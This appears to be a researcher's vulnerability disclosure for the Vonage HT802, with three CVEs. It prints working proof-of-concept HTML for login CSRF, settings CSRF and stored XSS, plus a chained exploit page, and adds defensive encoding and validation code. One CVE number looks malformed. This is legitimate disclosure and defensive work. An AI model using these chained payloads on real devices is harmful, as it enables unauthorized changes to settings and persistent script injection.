I have disclosed three vulnerabilities in the Vonage (Grandstream) HT802. I haven’t received a response from Vonage. These vulnerabilities can be chained to inject persistent XSS in the Basic Settings screen of the device.
Update: I have received the following CVEs for these vulnerabilities:
1.) Cross-Site Request Forgery (CSRF) vulnerability in the login screen (/cgi-bin/login) allows an attacker to log into a target Vonage device. (CVE-2017-165635)
```html
<html>
<body>
<form style="visibility: hidden" id="csrf" name="loginForm" action="http://192.168.0.160/cgi-bin/dologin" method="POST">
<input name="P2" type="password" value="123">
<input type="submit" name="Login" value="Login">
<input name="gnkey" type=hidden value=0b82>
</form>
<script>
document.getElementById("csrf").submit();
</script>
</body>
</html>
```
POC Verified in Firefox 56.0 on macOS
2.) Cross-Site Request Forgery (CSRF) vulnerability in the Basic Settings screen allows an attacker to modify system settings. (CVE-2017-16563)
```html
<html>
<body>
<form id="xss-form" action="http://192.168.0.160/cgi-bin/update" method="post">
<input name="P196" value="">
<input name="P901" value="80">
<input name="P8" value="0">
<input name="P146" value="">
<input name="P148" value="">
<input name="P148" value="csrf-entry" maxlength="32" size="30" type="text">
<input name="P9" value="192">
<input name="P10" value="168">
<input name="P11" value="0">
<input name="P12" value="160">
<input name="P13" value="255">
<input name="P14" value="255">
<input name="P15" value="0">
<input name="P16" value="0">
<input name="P17" value="0">
<input name="P18" value="0">
<input name="P19" value="0">
<input name="P20" value="0">
<input name="P64" value="TZG%2B6">
<input name="P246" value="MTZ%2B6MDT%2B5%2CM3.2.0%2CM11.1.0">
<input name="P143" value="1">
<input name="P342" value="0">
<input name="update" value="update">
<input name="gnkey" type=hidden value=0b82>
</form>
<script>
document.getElementById("xss-form").submit()
</script>
</body>
</html>
```
POC Verified in Firefox 56.0 on macOS
3.) Stored Cross-site scripting (XSS) vulnerability in cgi-bin/config2 in Vonage HT802 allows remote authenticated users to inject arbitrary web script or HTML via the DHCP vendor class ID field (P148). (CVE-2017-16564)
```html
<html>
<body>
<form id="xss-form" action="http://192.168.0.160/cgi-bin/update" method="post">
<input name="P196" value="">
<input name="P901" value="80">
<input name="P8" value="0">
<input name="P146" value="">
<input name="P148" value="">
<input name="P148" value=""autofocus/onfocus=alert(1)//" maxlength="32" size="30" type="text">
<input name="P9" value="192">
<input name="P10" value="168">
<input name="P11" value="0">
<input name="P12" value="160">
<input name="P13" value="255">
<input name="P14" value="255">
<input name="P15" value="0">
<input name="P16" value="0">
<input name="P17" value="0">
<input name="P18" value="0">
<input name="P19" value="0">
<input name="P20" value="0">
<input name="P64" value="TZG%2B6">
<input name="P246" value="MTZ%2B6MDT%2B5%2CM3.2.0%2CM11.1.0">
<input name="P143" value="1">
<input name="P342" value="0">
<input name="update" value="update">
<input name="gnkey" type=hidden value=0b82>
</form>
<script>
document.getElementById("xss-form").submit()
</script>
</body>
</html>
```
POC Verified in Firefox 56.0 on macOS
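The stored XSS works because cgi-bin/config2 writes the saved P148 value straight into the `value="..."` attribute of the Basic Settings form, so a value beginning with a double quote closes the attribute and everything after it is parsed as new attributes. As an added example (mine, not the device's firmware), here is the rendering fix, attribute-context encoding, beside the unsafe rendering the disclosure describes, plus an input-side check for /cgi-bin/update. The function names and the "printable ASCII, no quotes or angle brackets" policy are assumptions for the demo; the 32-character limit is the form's own `maxlength`.

```javascript
// Added example: safe vs. unsafe rendering of the DHCP vendor class ID (P148)
// and write-path validation. Not the HT802's real code.

// HTML attribute-context encoding: the characters that can end or alter a
// quoted attribute value are replaced with entities.
function encodeAttr(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Unsafe rendering, as the disclosure describes config2 behaving: the stored
// value is interpolated verbatim into the attribute.
function renderVendorClassFieldUnsafe(value) {
  return `<input name="P148" value="${value}" maxlength="32" size="30" type="text">`;
}

// Fixed rendering: identical markup, value encoded for attribute context.
function renderVendorClassField(value) {
  return `<input name="P148" value="${encodeAttr(value)}" maxlength="32" size="30" type="text">`;
}

// Defence in depth on the write path (assumed policy): at most 32 characters,
// printable ASCII only, and none of the characters that matter in markup.
function validateVendorClassId(value) {
  return (
    typeof value === "string" &&
    value.length <= 32 &&
    /^[\x20-\x7E]*$/.test(value) &&
    !/["'<>&]/.test(value)
  );
}

// Rough model of how a tokenizer sees the tag: blank out quoted attribute
// values, then look for an on* event-handler attribute in what remains
// (attributes may be separated by whitespace or '/'). Not a real HTML parser;
// enough to show whether the stored value escaped its attribute.
function hasEventHandlerAttribute(tag) {
  const withoutValues = tag.replace(/"[^"]*"/g, '""');
  return /[\s\/]on[a-z]+=/i.test(withoutValues);
}

// The payload from the disclosure, as it would sit in the device's config.
const storedPayload = '"autofocus/onfocus=alert(1)//';

console.log(renderVendorClassFieldUnsafe(storedPayload)); // onfocus becomes an attribute
console.log(renderVendorClassField(storedPayload));       // stays inside value="..."
console.log(validateVendorClassId(storedPayload));        // false: rejected before storage
```

Encoding on output is the fix that closes the bug; the validation only narrows what reaches storage and should not be relied on alone, since the same stored value may be rendered in other contexts (a JavaScript string, a log page) where a different encoding applies.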
These three vulnerabilities can be chained to inject a persistent XSS payload into the Basic Settings page.
```html
<html>
<body>
<iframe id="csrf" src="./login-csrf.html"></iframe>
<form id="xss-form" action="http://192.168.0.160/cgi-bin/update" method="post">
<input name="P196" value="">
<input name="P901" value="80">
<input name="P8" value="0">
<input name="P146" value="">
<input name="P148" value="">
<input name="P148" value=""autofocus/onfocus=alert(1)//" maxlength="32" size="30" type="text">
<input name="P9" value="192">
<input name="P10" value="168">
<input name="P11" value="0">
<input name="P12" value="160">
<input name="P13" value="255">
<input name="P14" value="255">
<input name="P15" value="0">
<input name="P16" value="0">
<input name="P17" value="0">
<input name="P18" value="0">
<input name="P19" value="0">
<input name="P20" value="0">
<input name="P64" value="TZG%2B6">
<input name="P246" value="MTZ%2B6MDT%2B5%2CM3.2.0%2CM11.1.0">
<input name="P143" value="1">
<input name="P342" value="0">
<input name="update" value="update">
<input name="gnkey" type=hidden value=0b82>
</form>
<script>
var frame = document.getElementById('csrf');
frame.addEventListener("load", function() {
  // Give the login CSRF in the frame a second to complete, then submit the
  // settings form (submit() must be wrapped in a function, otherwise it runs
  // immediately and setTimeout receives its undefined return value).
  window.setTimeout(function() { document.getElementById("xss-form").submit(); }, 1000);
});
</script>
</body>
</html>
```